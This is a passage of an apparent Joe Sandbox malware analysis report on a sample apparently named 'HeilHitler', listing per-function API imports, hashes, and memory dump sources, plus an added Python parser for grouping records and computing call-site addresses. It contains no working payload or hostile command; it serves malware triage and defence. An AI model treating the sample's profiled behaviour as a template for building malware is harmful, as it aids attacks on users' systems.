• Instruction Fuzzy Hash: 56217161F1864281FB609BA4E8573B67290BF88354FC01332E56EE77E5EE2CE505E700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
• Instruction ID: 41e7c414f1f24851d6bd88147b24f59ed5fc926e818fa220cb428853ac172b60
• Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
• Instruction Fuzzy Hash: 9DC12922A1CB8781E7619F9590462BD7B60FF81B90F594331EA8EA3791CF7CE845A700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
• Instruction ID: 85ca96772ff03f063ac1d8247f753327b3eae382b12b32df1e19e35e9204c46f
• Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
• Instruction Fuzzy Hash: C4216031A0C64642EB108BD5B54523AB3A0FF857A1F901335EABD97BE5DE7CE4459B00

Control-flow Graph

APIs
  • Part of subcall function 00007FF633D68570: GetCurrentProcess.KERNEL32 ref: 00007FF633D68590
  • Part of subcall function 00007FF633D68570: OpenProcessToken.ADVAPI32 ref: 00007FF633D685A3
  • Part of subcall function 00007FF633D68570: GetTokenInformation.KERNELBASE ref: 00007FF633D685C8
  • Part of subcall function 00007FF633D68570: GetLastError.KERNEL32 ref: 00007FF633D685D2
  • Part of subcall function 00007FF633D68570: GetTokenInformation.KERNELBASE ref: 00007FF633D68612
  • Part of subcall function 00007FF633D68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF633D6862E
  • Part of subcall function 00007FF633D68570: CloseHandle.KERNEL32 ref: 00007FF633D68646
• LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D6916C
• LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D69175
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!

Control-flow Graph

APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D107
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                            • Instruction ID: 680f331bb7deda9891d330232410544df533785e7e569a43170d11caffb2d2f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84D06C11B09B0642EA182FB1589B07812556F88B01B142638C82FAA393ED3CB84D6300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction ID: fc5356c7eb802d985e62e58080e3a4ed0cc3ff611ae5dba2789b26f0a536a27a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A512422B0925286FB289EF5A40267A6691BF84BB4F184734DE7DE77D5CE3CE401A600
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction ID: 528c13ac300fcc56f4705cb4b58e9af3934c80681faf2d2725b38b10881988d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112322B08A8181DA208F65B801169A361FB81FF0F540331EE7DABBE8CF3CE0148700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction ID: 961b76213ca98761911f8107df0f137bddfc197f78ccfadd275760d864e1703e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE08C50F1920282FF096FF2A8571381261AF88B00F840330D81DEA3A2EE2CA892A310
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABC6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABD0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                            • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction ID: bb6fadb88fe661f1c50253329f5dc08f00c8fd4f1c04d8527db8b862d570277d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21E721F2C68241FEA59FE5949737D12829F847A1F084339EA2EE77D2CE6DE4416300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction ID: 2dc2c58e76882c7fe97a43a83f5e256a02c0927397f6123dc5a542c555bc85c4
• Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction Fuzzy Hash: BD41D63291824587EA349FA9A542279B7A0EB55B94F100331E78ED37D1CF3EE443EB51

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 92d29e443cb0c06cef3e21f718b83060998d20949f4fd0e1cf3ffbb0f0d41c49
• Instruction ID: c482a39cc030fcbdb5c74d12cf6a9067f0b0d24bee4a908b9c7825a79cfd48ab
• Opcode Fuzzy Hash: 92d29e443cb0c06cef3e21f718b83060998d20949f4fd0e1cf3ffbb0f0d41c49
• Instruction Fuzzy Hash: 0A21F721B18B5246FF109FA268063BAA651BF45BC4FCC5930EE1DA7786CE7DE051D300

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction ID: af70bb7a3c6f31b9e390633d1bb89b6c7acd811030c50bd4684439e7c952e65f
• Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction Fuzzy Hash: F131C962E1865285F7116FD5884337D2AA0BF80BA4F410335E96DE33D2DFBCE481A711

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
• Instruction ID: 08a48d81eb2e38cde53b7a9b429888a20b3ff0beacc9ba66e80b9356148f543d
• Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
• Instruction Fuzzy Hash: 82217AB2A057468AFB248FA4C4822EC33A0FB44718F44573AD76EA6BD5DF38D584DB40

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 71194e22d05641b10dc65178b92433d9c01259dbd81bc5257bd447ae03344ba5
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: AA118731A2C64281FA619F91940217DE265BF85B84F844635FB8CF7BD6CF3DD441A701

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction ID: 681b49116d6078b83f6c01a51bb582aea50fed0a75d1bbc720fa48e5edc4b4eb
• Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction Fuzzy Hash: 8121C232A08A4586DB618FA8D44237976A1FB84B64F185334E75DDB7D9DF3CE4019B00

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 8100abf10ddfc778ae3f560dacaff004b234dc34a937c99278895e9b877d69de
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 26019621A0874581EA04DFA6A902179A6A5FF85FE4F484731EE6CB7BD6CF3CE401A300
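The records above are the report's per-function listing: each function carries the resolved imports it calls (the API ID), a numeric API String ID that appears to be derived from the API ID and String ID (the suffix is 0 wherever the String ID is empty), content hashes (Opcode ID, Instruction ID) and fuzzy hashes for similarity matching, plus the memory dump the function was lifted from with its image base ("Offset: 00007FF633D60000"). When triaging a report like this one, two pivots are common: collecting every function that shares an API String ID (several functions on this page share 3215553584-0, the `_invalid_parameter_noinfo` stub), and converting a call-site `ref:` address into an RVA relative to the dump's image base so it can be matched against the PE on disk or in IDA. The following parser is an added example written for this page, not Joe Sandbox code; it assumes only the line layout visible above and works on a constructed, abridged sample built from the records on this page (the "Associated:" dump lines and the IDA snapshot lines are omitted, and the last record is intentionally left without a Similarity block to show how a truncated record is handled).

```python
import re
from collections import defaultdict

# Constructed, abridged sample in the layout of this report's per-function
# records. The last record carries the one resolved API call on this page and
# is cut off after its dump source, as it is in the report text itself.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Similarity
• API ID: _fread_nolock
• API String ID: 840049012-0
• Opcode ID: 92d29e443cb0c06cef3e21f718b83060998d20949f4fd0e1cf3ffbb0f0d41c49
• Instruction ID: c482a39cc030fcbdb5c74d12cf6a9067f0b0d24bee4a908b9c7825a79cfd48ab
• Instruction Fuzzy Hash: 0A21F721B18B5246FF109FA268063BAA651BF45BC4FCC5930EE1DA7786CE7DE051D300
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• API String ID: 3215553584-0
• Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction ID: af70bb7a3c6f31b9e390633d1bb89b6c7acd811030c50bd4684439e7c952e65f
• Instruction Fuzzy Hash: F131C962E1865285F7116FD5884337D2AA0BF80BA4F410335E96DE33D2DFBCE481A711
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 71194e22d05641b10dc65178b92433d9c01259dbd81bc5257bd447ae03344ba5
• Instruction Fuzzy Hash: AA118731A2C64281FA619F91940217DE265BF85B84F844635FB8CF7BD6CF3DD441A701
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF633D7B32A,?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A), ref: 00007FF633D7EBED
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
"""

# "• Api.MODULE(args), ref: <hex>" as printed under the APIs header.
API_CALL = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Image base of the dump the function was lifted from.
OFFSET = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")
# Generic "• Key: value" bullet under the Similarity header.
FIELD = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SECTIONS = ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


def parse_records(text):
    """Split the report text into one dict per function record.

    A record starts at an "APIs" header. Missing sections (for example a
    record truncated before its Similarity block) simply leave their
    fields empty rather than raising.
    """
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = {"apis": [], "base": None, "fields": {}}
            records.append(current)
            section = "apis"
            continue
        if current is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "apis":
            m = API_CALL.match(line)
            if m:
                current["apis"].append({"api": m["api"], "module": m["module"],
                                        "args": m["args"], "ref": int(m["ref"], 16)})
        elif section == "Memory Dump Source":
            m = OFFSET.search(line)
            if m and current["base"] is None:
                current["base"] = int(m["base"], 16)
        elif section == "Similarity":
            m = FIELD.match(line)
            if m:
                current["fields"][m["key"]] = m["value"]
    return records


def group_by_api_string_id(records):
    """Map each API String ID to the Instruction IDs of the functions sharing it."""
    groups = defaultdict(list)
    for r in records:
        key = r["fields"].get("API String ID")
        if key:
            groups[key].append(r["fields"].get("Instruction ID"))
    return dict(groups)


def call_site_rvas(records):
    """Turn every resolved API call site into (api, RVA) using the dump's image base."""
    out = []
    for r in records:
        if r["base"] is None:
            continue
        for call in r["apis"]:
            out.append((f"{call['api']}.{call['module']}", call["ref"] - r["base"]))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for key, members in group_by_api_string_id(recs).items():
        print(f"API String ID {key}: {len(members)} function(s)")
    for api, rva in call_site_rvas(recs):
        print(f"{api} called from RVA 0x{rva:X}")
```

Run on the full report text instead of the sample, the grouping step turns the Similarity blocks into clusters of functions that import the same set of APIs, and the RVA step gives addresses that stay valid when the sample is loaded at a different base (the `ref:` values in the report are absolute addresses from the sandbox run, not RVAs).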

APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF633D7B32A,?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A), ref: 00007FF633D7EBED
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
